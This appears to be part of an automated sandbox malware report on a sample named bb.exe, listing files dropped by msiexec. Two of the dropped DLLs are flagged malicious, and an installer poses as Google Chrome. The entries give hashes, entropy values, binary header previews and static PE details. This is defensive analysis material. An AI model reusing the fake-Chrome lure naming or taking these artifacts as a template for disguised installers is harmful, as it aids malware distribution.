                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                      C:\Windows\Installer\MSIFCA4.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):753984
                                                                                                      Entropy (8bit):6.461872633696775
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:sXWV44ngBNmhAzLUhfVdrjpuG1PE0I7+avw4UbY6t5rXf63Rfklet:KWV4zHzLUdVB1n1PE0Yw4Ubz5rXf63hL
                                                                                                      MD5:8DD026145833182777A182A646DF81F3
                                                                                                      SHA1:4F5CB840193EEA97DF088C83A794FB6E8F67AB07
                                                                                                      SHA-256:3071AF6BE43A2611DB45205F0D3F1F25ABA05ACF5F70992FCE2FFFD63EE9C85D
                                                                                                      SHA-512:F6C860BF563A24C046A7D76A6BC1E2F6BBFC80A87AC4513DE331049F35198DCBBDBB5BE7F5D49100E1D1C8AB680ECF3EAAA4FDB8F744C9FD5479A1BA64079391
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......':r.c[.Tc[.Tc[.T.).Un[.T.).U.[.T.%.Ur[.T.%.U{[.T.).Uz[.T.%.U=[.T.).Ub[.T.).Ut[.Tc[.T.Z.Tz$.U([.Tz$.Ub[.Tz$.Tb[.Tc[.Tb[.Tz$.Ub[.TRichc[.T................PE..L....=.d.........."!...$.>..........+........P............................................@.........................`..................h............D..@=.......r.....p............................e..@............P..........@....................text....=.......>.................. ..`.rdata...q...P...r...B..............@..@.data...H(..........................@....rsrc...h...........................@..@.reloc...r.......t..................@..B................................................................................................................................................................................................................................................................................

                                                                                                      C:\Windows\Installer\MSIFEB8.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):602432
                                                                                                      Entropy (8bit):6.469389454249605
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                                                                      MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                                                      SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                                                      SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                                                      SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                      C:\Windows\Installer\MSIFF94.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):203343
                                                                                                      Entropy (8bit):5.774837076913133
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:eNjJLNcuS5op5WRYrh5y55d55655f555f55515556555h555eP555Q555k555H5q:eDLSuSOjqzb+GtH
                                                                                                      MD5:FE1C659CAD1F3A1F9249BB379EA338B8
                                                                                                      SHA1:7F535552A82A63D07424559CDA540C1E32086203
                                                                                                      SHA-256:6818B4E95753126FDC42F4607916FA09E3E7916B0D228552B723D0DE9617ACE3
                                                                                                      SHA-512:FC1521A8C6C62C23C8ADEB213AE770850330666A071D4B6888673914B8A8E4CE568655243699F624BCC90D8F076C8940A880F002F5694CE39D464E8CF760E6F5
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:...@IXOS.@.....@@.'W.@.....@.....@.....@.....@.....@......&.{C0E9F3B5-1040-4A45-ACBB-0C1165F58D53}..Google Chrome..Google Chrome.msi.@.....@T..t.@.....@....'.MarcusRobertoGooglePlayGoogleChrome.exe..&.{7999D004-3FE0-4CD8-943E-BF9FBB0A2001}.....@.....@.....@.....@.......@.....@.....@.......@......Google Chrome......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{D70E607B-4D9A-4548-AF2E-1E1200F61D0D}*.C:\Program Files\Google LLC\Google Chrome\.@.......@.....@.....@......&.{B04D4B4B-8EDE-4720-89FB-9A1B26123FC9}-.22:\Software\Google LLC\Google Chrome\Version.@.......@.....@.....@......&.{DF7EBEE6-E247-47DC-A0CB-847F491D7928}3.C:\Program Files\Google LLC\Google Chrome\setup.exe.@.......@.....@.....@......&.{09799D1C-534A-4BA8-A6F1-932AA94B9DFA}C.C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\.@.......@.....@.....@......&.{EA568868-C408-412A-96

                                                                                                      C:\Windows\Installer\SourceHash{C0E9F3B5-1040-4A45-ACBB-0C1165F58D53}

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20480
                                                                                                      Entropy (8bit):1.206098380251401
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:JSbX72FjUXAlfLIlHuRpLhG7777777777777777777777777ZDHFYq8CldFqq/92:J0UIwSC0KQyF
                                                                                                      MD5:8332FD629A0D71EE30F49E39700B546B
                                                                                                      SHA1:DA6F8A679769E1C809D09A5D8ABF566AAB290F07
                                                                                                      SHA-256:52EE3F39D013DF0C472FF106D1D492205E7D593C18715D9F12C761F4B31322E6
                                                                                                      SHA-512:94587C5792D7E3F3912AB1F5557283DF5B4D0CABEE18FA381B5DBCD50B41F3203E0171A72716F3AD8A1494BC5EE76925D5D60372AA09403BC88308A4B1F3F79A
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20480
                                                                                                      Entropy (8bit):1.8156295453909599
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:bho1DjTaxyRCNaVX5apwHrqYea5X5qRCycw5:q1/1GaTHw6q3l
                                                                                                      MD5:6DB2B99D698E1B3546EBBA30E49ACE75
                                                                                                      SHA1:71F98E02DA4D91D1191CFEB2A502D2AFFE625585
                                                                                                      SHA-256:6185667C7F92972E9FDFBD25A6EA013CE62F0D2D34E8C761C33909A4634B117F
                                                                                                      SHA-512:7C0260F61C694B606975BE4B54CBD1D2CDCCC981455979C8DD12DA353EE9261BF313F4268C4E9727EDCEC794E7DAFE8118226B0BE411970BA14FF6F7024711AD
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Windows\Installer\{C0E9F3B5-1040-4A45-ACBB-0C1165F58D53}\MarcusRobertoGooglePlayGoogleChrome.exe

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:MS Windows icon resource - 9 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                                      Category:dropped
                                                                                                      Size (bytes):196712
                                                                                                      Entropy (8bit):5.691366099673465
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:3NjJLNcuS5op5WRYrh5y55d55655f555f55515556555h555eP555Q555k555H5K:3DLSuSOjqzb+Gt
                                                                                                      MD5:DC171A2CAC0F3B2B1D4D3EE4AA335650
                                                                                                      SHA1:A21DFE681A0A4CE1480D2F62603E9D06160B4B01
                                                                                                      SHA-256:F0A071144E242E42BE2DA42D4E02DD329BF2E033F3F4CA530A7A15A4CD1C1C37
                                                                                                      SHA-512:8C1947D2C98B23D2A73FC202B9FC8BFE8FD400BB6242C3BFDDF608120174EE558C4F654C51CC2A5712F31C414EA0CCACD3167012F7FE626687A621395C3A2856
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:............ ............... .(.......``.... ........HH.... ..T..x%..@@.... .(B...z..00.... ..%..(... .... ............... .....x......... .h........PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..y..Gy'...>..%]IW.d.l...66..!..,a_B.0...$/yoB2.....KB......0$....B.`cc./.o.lK..X..]............9.^I.....vwuuuu.....WU..................................................r2q.+.b.ng.7.3\...E[!..c..[..-6.W.b....,=..7..-.........W.a.....[......;.>....v.;...).#[!..k.\o.........../.....o.......v...n....-....u...r.....uR..[D[!.....=o.MkW.|...}...v...g...V.`q.....].f..<.<.|..}J..b...H..$..N.b...X..kq/..*-..."../o.H...n...6..9e...."....@..I7[.T...$D.[..zKQ.[....(ZS.......Fa..\.(..jQx.....L+..$...k..i..ON6N......k.&.r....\.,.w..$.B..d+...]....N. '.....b..@mCo.gK_..5C{7..w..U{Gzj.{K.y.0.8.l.\.uxb......c...&.........h.?<5.....tS....."..4.|.!.>wm..:...hoE../...2.C..[=.s.P..}k..n.....kk.k..a.i.....(.!.d].I..s......{zz....}.Sc..pl.

                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):384899
                                                                                                      Entropy (8bit):5.396113061576891
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:RI4n9QUdcz/9xT8lGj7xIGiGf8hff7SUo954QRj6X/MruGtxHnU/1JcvK289sms3:RI4KBZa5g
                                                                                                      MD5:AB42F859C5DC02647BCF7FD96C7062F3
                                                                                                      SHA1:7D75F206DEC0DFEB848A6BA517FC2A065BA9A5F8
                                                                                                      SHA-256:E479F1E175508D13D3CD615192FB0E425C7611B670FFE849EA66BBAB528DC277
                                                                                                      SHA-512:93F1847B72D640B365198BEFDA9D8A32EA01ADB14EEA3140BCBB51CC91C02AD9A0155495707C4B9E83A40C9F21CEE0EF0F0899EC4255D38A5214C01DC11F460A
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 11:01:23.494 [4132]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting.v9.0, Version=9.0.0.00000000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 11:01:23.494 [4132]: ngen returning 0x00000000..07/23/2020 11:01:23.541 [2300]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument.v10.0, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 11:01:23.557 [2300]: ngen returning 0x00000000..07/23/2020 11:01:23.603 [5144]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Outlook.v9.0, Version=9.0.0.00000000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3

                                                                                                      C:\Windows\Temp\~DF0AF7CCC57538034C.TMP

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):512
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3::
                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Windows\Temp\~DF327FBB2313C64BAE.TMP

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):512
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3::
                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Windows\Temp\~DF40824CEF12EB577F.TMP

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):512
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3::
                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Windows\Temp\~DF47E8198924D2224E.TMP

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20480
                                                                                                      Entropy (8bit):1.8156295453909599
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:bho1DjTaxyRCNaVX5apwHrqYea5X5qRCycw5:q1/1GaTHw6q3l
                                                                                                      MD5:6DB2B99D698E1B3546EBBA30E49ACE75
                                                                                                      SHA1:71F98E02DA4D91D1191CFEB2A502D2AFFE625585
                                                                                                      SHA-256:6185667C7F92972E9FDFBD25A6EA013CE62F0D2D34E8C761C33909A4634B117F
                                                                                                      SHA-512:7C0260F61C694B606975BE4B54CBD1D2CDCCC981455979C8DD12DA353EE9261BF313F4268C4E9727EDCEC794E7DAFE8118226B0BE411970BA14FF6F7024711AD
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Windows\Temp\~DF4CDD921CA143CDF4.TMP

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):73728
                                                                                                      Entropy (8bit):0.2320169886200365
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:o7QWlIAET4dARiAEkrCyMgSkdARVdARiAEkrCyMmtAajBT7QWlMq4/3GWw3GWSk+:y5loRCyTRCNaVX5apwHrqYea5X5sG
                                                                                                      MD5:116DE378D2468C8A9302A9B6A058BD0E
                                                                                                      SHA1:4F63B0159C2A55FECC26CB7D3EEBBF4A44E26A7D
                                                                                                      SHA-256:1E934D0655EA534085DAB1EAC7C71B8A51DDA54D045D7E7225C942B7E0134D8E
                                                                                                      SHA-512:B46A1E1B69185B8604CF36DC1F97136F1B71CD2FCAF21BBBA58EF14706C9A76336D0CA913E07967907B469AFDF8D9247D0ACB00773F755057C3FD2810D94335D
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Windows\Temp\~DF88AC2D540D42D412.TMP

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):512
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3::
                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Windows\Temp\~DF8A51FE2BF91CE3CB.TMP

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                      Category:dropped
                                                                                                      Size (bytes):32768
                                                                                                      Entropy (8bit):1.4358929555661621
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:MA9HTLe0xyRCNaVX5apwHrqYea5X5qRCycw5:L9HfyGaTHw6q3l
                                                                                                      MD5:4B9558D9FE5C0FC60F249890EF6A1A2D
                                                                                                      SHA1:0C0222D140F380203ED599F37535CC38F15EAF28
                                                                                                      SHA-256:F955D9525D77CBA3E91C7970693DA3B347C67B24F3EF0448099ED71F48AD95DD
                                                                                                      SHA-512:509E1F9D48D618C67B85D542037341428B60F0F1B260A1AE3589F3932A836919E4447B881CF93037F4DEBFDA54BA60D1FAE22A7B0AA0769BC0B8FF041937812E
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Windows\Temp\~DF9FE401D412302DC1.TMP

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                      Category:dropped
                                                                                                      Size (bytes):32768
                                                                                                      Entropy (8bit):1.4358929555661621
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:MA9HTLe0xyRCNaVX5apwHrqYea5X5qRCycw5:L9HfyGaTHw6q3l
                                                                                                      MD5:4B9558D9FE5C0FC60F249890EF6A1A2D
                                                                                                      SHA1:0C0222D140F380203ED599F37535CC38F15EAF28
                                                                                                      SHA-256:F955D9525D77CBA3E91C7970693DA3B347C67B24F3EF0448099ED71F48AD95DD
                                                                                                      SHA-512:509E1F9D48D618C67B85D542037341428B60F0F1B260A1AE3589F3932A836919E4447B881CF93037F4DEBFDA54BA60D1FAE22A7B0AA0769BC0B8FF041937812E
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Windows\Temp\~DFD9B00A6CC1EA8009.TMP

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):512
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3::
                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Windows\Temp\~DFD9DAAA79831B0154.TMP

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):32768
                                                                                                      Entropy (8bit):0.10206038338113517
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:xPLG7iVCnLG7iVrKOzPLHKOY0+/CPUCl8aFq8f/G0l8an6laVky6lVSlsq:50i8n0itFzDHFYq8CldFqq/9d6LQsq
                                                                                                      MD5:77DC79B8022CA94C3FF278DD9F86A267
                                                                                                      SHA1:61C47B0609C02440F88E4BD26F2F80F1B1E53FC9
                                                                                                      SHA-256:5D02D6C11159F97DBAE21C08F58A5E3F684C712D793FFEAE94345F378793EAD8
                                                                                                      SHA-512:1ED309853717EFCAB9ACD3958D168AE47DF38374AF698E28CD156C21FC728742BE359DC1D8E4B9B2FA5FFC0F80D1343CF7390C5ADB9F1DC7B728A2D02D25368F
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Windows\Temp\~DFDAB59268CA0449E8.TMP

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20480
                                                                                                      Entropy (8bit):1.8156295453909599
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:bho1DjTaxyRCNaVX5apwHrqYea5X5qRCycw5:q1/1GaTHw6q3l
                                                                                                      MD5:6DB2B99D698E1B3546EBBA30E49ACE75
                                                                                                      SHA1:71F98E02DA4D91D1191CFEB2A502D2AFFE625585
                                                                                                      SHA-256:6185667C7F92972E9FDFBD25A6EA013CE62F0D2D34E8C761C33909A4634B117F
                                                                                                      SHA-512:7C0260F61C694B606975BE4B54CBD1D2CDCCC981455979C8DD12DA353EE9261BF313F4268C4E9727EDCEC794E7DAFE8118226B0BE411970BA14FF6F7024711AD
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Windows\Temp\~DFEA3EEBAF25F7DBF9.TMP

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                      Category:dropped
                                                                                                      Size (bytes):32768
                                                                                                      Entropy (8bit):1.4358929555661621
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:MA9HTLe0xyRCNaVX5apwHrqYea5X5qRCycw5:L9HfyGaTHw6q3l
                                                                                                      MD5:4B9558D9FE5C0FC60F249890EF6A1A2D
                                                                                                      SHA1:0C0222D140F380203ED599F37535CC38F15EAF28
                                                                                                      SHA-256:F955D9525D77CBA3E91C7970693DA3B347C67B24F3EF0448099ED71F48AD95DD
                                                                                                      SHA-512:509E1F9D48D618C67B85D542037341428B60F0F1B260A1AE3589F3932A836919E4447B881CF93037F4DEBFDA54BA60D1FAE22A7B0AA0769BC0B8FF041937812E
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):6.908037617318659
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 98.81%
                                                                                                      • Windows ActiveX control (116523/4) 1.15%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:bb.exe
                                                                                                      File size:11'824'016 bytes
                                                                                                      MD5:0b61f6fcf7864a2f87d91e3a1eecf340
                                                                                                      SHA1:104a099a866204117bad60c22a9ef35a8865a56a
                                                                                                      SHA256:bbce6e4e32e181468d77eaf31f1d6929194ea3631977367fb6aa678d8f66344f
                                                                                                      SHA512:fb84788234755c13315e50debf3d672a969ccea8bd7b610c2c2f815a94363d00a642f81c0cf44356564b9e800cd87761fb26e8b1fc0562002dcd9355b3aa7455
                                                                                                      SSDEEP:196608:Qfl0kYa05bfl0kYa0s05Swz/ic6c+sfh/0Pe:KRYXRYtSOiefd
                                                                                                      TLSH:B7C67C217286C43BD66701B12A2DDA9F5538BE720BB154CBB3DC2E6E5BB44C21336E17
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........."2..La..La..La".O`..La".I`J.La".J`..LaU.H`..LaU.O`..LaU.I`..La".H`..La".M`..La".K`..La..Ma..La..E`..La...a..La...a..La..N`..L

                                                                                                      File Icon

                                                                                                      Icon Hash:010905619293c52c

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x5e0862
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:true
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x64D239D2 [Tue Aug 8 12:49:22 2023 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:6
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:6
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:6
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:21314122cd4542a6b9b297f52a87acbe

                                                                                                      Authenticode Signature

                                                                                                      Signature Valid:false
                                                                                                      Signature Issuer:CN=TestCert_2023-9-3_14-20-2
                                                                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                      Error Number:-2146762487
                                                                                                      Not Before, Not After
                                                                                                      • 9/3/2023 4:10:17 AM 9/3/2024 4:30:17 AM
                                                                                                      Subject Chain
                                                                                                      • CN=TestCert_2023-9-3_14-20-2
                                                                                                      Version:3
                                                                                                      Thumbprint MD5:D2F496796E66378C09C38D31C69DB908
                                                                                                      Thumbprint SHA-1:7A3AB06DFC4CF09B89261432A938C0C6BA23F834
                                                                                                      Thumbprint SHA-256:02AE015FDB366EB4EFBBD8BF42826F0DC7789EA92DEE1974D0FAD8F0AD8A3CC1
                                                                                                      Serial:2121F0CD2F9725BD498AB35A0F258B5B

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      call 00007EFC704FC89Dh
                                                                                                      jmp 00007EFC704FC0CFh
                                                                                                      mov ecx, dword ptr [ebp-0Ch]
                                                                                                      mov dword ptr fs:[00000000h], ecx
                                                                                                      pop ecx
                                                                                                      pop edi
